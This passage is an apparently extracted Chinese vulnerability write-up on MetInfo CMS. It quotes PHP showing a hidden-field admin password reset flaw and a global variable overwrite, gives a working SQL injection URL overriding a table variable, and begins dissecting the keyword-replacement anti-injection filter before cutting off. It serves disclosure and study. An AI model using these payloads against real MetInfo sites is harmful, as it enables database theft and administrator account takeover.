MetInfo 全局变量覆盖另类突破防注入.docVIP

MetInfo 全局变量覆盖另类突破防注入 图文/Yaseng (www.yaseng.me) 前言 对于相对成熟的cms, sql inject,xss 都有完善的自身防御代码。然而一些逻辑错误以及意识上的误区安全缺陷 MetInfo是国内使用非常广泛的企业管理系统,采用PHP+Mysql架构 又是管理员和前台会员在一个表的,这下方便多了,注册普通会员,查看源码 。 有个 hidden 的 字段,目测有鬼,继续跟踪到 save.php if($action==editor){ $query = update $met_admin_table SET admin_id = $useid, … = ……， if($pass1){ $pass1=md5($pass1); $query .=, admin_pass = $pass1; } $query .= where admin_id=$useid; $db-query($query); okinfo(basic.php?lang=.$lang,$lang_js21); } 看红色的代码 $useid 则是刚才(后面会讲到) hidden 的字段,不是有句话叫做一切用户输入都是有害的,怎么能用这个更新资料的条件了,也就是说 只要知道管理员的名称 就可以改管理员的密码。那怎么知道管理员的名称了。 admin ？ 社工 ？ 暴力 ？ 我们继续往下看 … 全局变量覆盖 include\common.inc.php 是整个系统的核心文件,用户处理数据,连接数据库.. 一段狠经典的代码,导致国际问题全局变量覆盖。 foreach(array(_COOKIE, _POST, _GET) as $_request) { foreach($$_request as $_key = $_value) { $_key{0} != _ $$_key = daddslashes($_value); } } 接下来,找能利用的地方,最好是能直接getShell 什么的。 找了很久 都发现数据库操作 传进去的变量都单引号注释鸟,后台才发现我sb了。 ?php # MetInfo Enterprise Content Management System # Copyright (C) MetInfo Co.,Ltd (). All rights reserved. require_once ../include/common.inc.php; if($class1)$id=$class1; $job=$db-get_one(select * from $met_job where id=$id); if(!$job){ okinfo( $id 单引号鸟,那就直接覆盖 $met_job,不就可以了吗 ！！ /coder/minfo/job/showjob.php?id=1met_job=%60information_schema%60.%60SCHEMATA%60%23 访问正常，说明有搞头,开屎疯狂的注入… union 联合查询,却又弹出这个东东 。 额 蛋疼的防注入.... 防注入都是浮云 我们来看防注入代码 global $met_sqlreplace; if($met_sqlreplace){ $string = str_replace(select, \sel\ect, $string); $string = str_replace(insert, \ins\ert, $string); $string = str_replace(update, \up\date, $string); $string = str_replace(delete, \de\lete, $string); $string = str_replace(union, \un\ion, $string); $string = str_replace(into, \in\to, $string); $string = str_replace(load_file, \load\_\file, $string); $string = str_replace(outfile, \out\file,